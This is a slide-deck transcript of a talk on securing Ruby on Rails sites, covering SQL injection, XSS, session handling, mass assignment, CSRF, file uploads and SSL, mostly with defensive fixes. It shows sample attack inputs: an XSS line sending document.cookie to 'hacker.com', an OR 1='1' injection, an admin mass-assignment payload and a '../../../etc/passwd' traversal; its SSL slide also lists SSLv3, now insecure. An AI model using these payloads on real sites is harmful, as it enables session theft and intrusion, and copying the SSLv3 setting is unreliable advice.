Tweet
Tweet

Slide 1

Slide 1 text

Securing your site. @bob_p

Slide 2

Slide 2 text

How Secure?

Slide 3

Slide 3 text

SQL injection

Slide 4

Slide 4 text

http://xkcd.com/327/

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

User.where("email ='#{params[:email]}'").first User.first(:conditions => "email = '#{params[:email]}’") SELECT "users".* FROM "users" WHERE (email = '' OR 1='1') LIMIT 1

Slide 7

Slide 7 text

User.find_by_email(params[:email]) User.where("email = ?", params[:email]).first User.first(:conditions => ["email = ?", params[:email]])

Slide 8

Slide 8 text

Summary Sanitise all SQL input

Slide 9

Slide 9 text

XSS alert(‘h4x0r3d’);

Slide 10

Slide 10 text

alert(‘h4x0r3d’); document.write(‘<img src="http:// hacker.com/' + document.cookie + '">’);

Slide 11

Slide 11 text

cookies(:secure_cookie, :httponly => true, :secure => true) Secure your cookies

Slide 12

Slide 12 text

html_escape(“”) Escape output < 3

Slide 13

Slide 13 text

“hello”.html_safe? SafeBuffer > 3

Slide 14

Slide 14 text

raw(“

hello

”) > 3 SafeBuffer

Slide 15

Slide 15 text

Summary Secure your cookies Ensure user submitted input is sanitised

Slide 16

Slide 16 text

Session management

Slide 17

Slide 17 text

Rails.application.config.session_store :cookie_store Rails.application.config.session_store :cache_store Rails.application.config.session_store :active_record_store Session stores

Slide 18

Slide 18 text

config.secret_token = '3783262ab68df94a79ab0 2edca8a1a9c3....' `rake secret`

Slide 19

Slide 19 text

XSS

Slide 20

Slide 20 text

Insecure networks Image from http://codebutler.com/

Slide 21

Slide 21 text

Rails.application.config.force _ssl = true

Slide 22

Slide 22 text

Allow logout

Slide 23

Slide 23 text

Timeout

Slide 24

Slide 24 text

MyApp::Application.config.session_store :cookie_store, :key => ‘_my_key’, :expire_after => 45.minutes class User < ActiveRecord::Base devise :authenticatable, :timeoutable, :timeout_in => 45.minutes end

Slide 25

Slide 25 text

reset_session

Slide 26

Slide 26 text

No concurrent logins

Slide 27

Slide 27 text

Account lockout

Slide 28

Slide 28 text

Password complexity

Slide 29

Slide 29 text

Destroy session on logout def logout reset_session end

Slide 30

Slide 30 text

Hash passwords class User def password=(password) self.encrypted_password = ::BCrypt::Engine.hash_secret(password, self.salt) end end

Slide 31

Slide 31 text

http://codahale.com/how-to-safely-store-a-password/ Use bcrypt

Slide 32

Slide 32 text

large objects No

Slide 33

Slide 33 text

critical data No

Slide 34

Slide 34 text

Summary SSL Hash data Clear sessions

Slide 35

Slide 35 text

Mass Assignment “public_key” => {“user_id” => 4223}

Slide 36

Slide 36 text

https://github.com/blog/1068-public-key-security-vulnerability-and-mitigation

Slide 37

Slide 37 text

def signup @user = User.create(params[:user]) end params[:user] = {:username => “pwn3d”, :admin => true}

Slide 38

Slide 38 text

class User attr_protected :admin end

Slide 39

Slide 39 text

class User attr_accessible :email end config.active_record.whitelist_attributes = true

Slide 40

Slide 40 text

class User attr_accessible :role, :as => :admin end

Slide 41

Slide 41 text

User.create({:username => ‘Bob’, :role => “admin”}, :as => :admin)

Slide 42

Slide 42 text

def signup @user = User.create(user_params) end def user_params params[:user].slice(:email) end

Slide 43

Slide 43 text

https://github.com/rails/ strong_parameters

Slide 44

Slide 44 text

Summary attr_accessible Slice pattern attr_protected

Slide 45

Slide 45 text

Direct object reference /users/:id/posts/:post_id

Slide 46

Slide 46 text

def create @user = User.find(params[:user_id]) @note = Note.create(:user => @user, :text => params[:text]) end

Slide 47

Slide 47 text

def create @user = User.find(session[:user_id]) @note = @user.notes.create(:text => params[:text]) end

Slide 48

Slide 48 text

def show @note = Note.find(params[:id]) end

Slide 49

Slide 49 text

def show @user = User.find(session[:user_id]) @note = @user.notes.find(params[:id]) end

Slide 50

Slide 50 text

def show @user = User.find(session[:user_id]) @note = Note.find(params[:id]) if @note.editable_by?(@user) # Do things end end

Slide 51

Slide 51 text

Summary Find users from session Use scoping methods

Slide 52

Slide 52 text

CSRF

Slide 53

Slide 53 text

Slide 54

Slide 54 text

POST PUT DELETE GET Safe requests / queries Changes resource / orders

Slide 55

Slide 55 text

Slide 56

Slide 56 text

class ApplicationController protect_from_forgery end

Slide 57

Slide 57 text

Summary Correct http verbs Rails CSRF protection

Slide 58

Slide 58 text

Redirection & file uploads

Slide 59

Slide 59 text

def login login_business redirect_to params[:from] end

Slide 60

Slide 60 text

def login login_business redirect_to session[:from] end

Slide 61

Slide 61 text

Sanitise file names

Slide 62

Slide 62 text

“../../../etc/passwd”

Slide 63

Slide 63 text

https://github.com/thoughtbot/paperclip/blob/master/lib/paperclip/ attachment.rb#L435 def cleanup_filename(filename) filename.gsub(/[&$+,\/:;=?@<>\[\]\ {\}\|\\\^~%# ]/, ‘_’) end

Slide 64

Slide 64 text

Sanitise file type

Slide 65

Slide 65 text

class User validates_attachment :avatar, :presence => true, :content_type => { :content_type => "image/jpg" }, :size => { :in => 0..10.kilobytes } end

Slide 66

Slide 66 text

Process asynchronously

Slide 67

Slide 67 text

Summary No redirect locations in params Sanitise file name/type Process files a-sync

Slide 68

Slide 68 text

SSL

Slide 69

Slide 69 text

Rails.application.config.force _ssl = true

Slide 70

Slide 70 text

ssl_ciphers HIGH:!aNULL:!MD5; ssl_protocols SSLv3 TLSv1;

Slide 71

Slide 71 text

Summary Use SSL!

Slide 72

Slide 72 text

Admin & intranet

Slide 73

Slide 73 text

CSRF

Slide 74

Slide 74 text

XSS

Slide 75

Slide 75 text

Whistlist.contains? (request.remote_ip)

Slide 76

Slide 76 text

Summary XSS / CSRF / Injection Restrict access

Slide 77

Slide 77 text

Info leakage

Slide 78

Slide 78 text

server_tokens off;

Slide 79

Slide 79 text

No content

Slide 80

Slide 80 text

Summary Don’t give away anything

Slide 81

Slide 81 text

Server-side

Slide 82

Slide 82 text

User privileges

Slide 83

Slide 83 text

config.filter_parameters += [:password]

Slide 84

Slide 84 text

Summary Restrict user permissions Obscure sensitive data

Slide 85

Slide 85 text

Resources

Slide 86

Slide 86 text

guides.rubyonrails.org/security.html

Slide 87

Slide 87 text

www.rorsecurity.info

Slide 88

Slide 88 text

brakemanscanner.org

Slide 89

Slide 89 text

github.com/relevance/tarantula

Slide 90

Slide 90 text

www.owasp.org

Slide 91

Slide 91 text

@bob_p http://mintdigital.com ColorPalette: http://www.colourlovers.com/lover/electrikmonk/loveNote Thanks!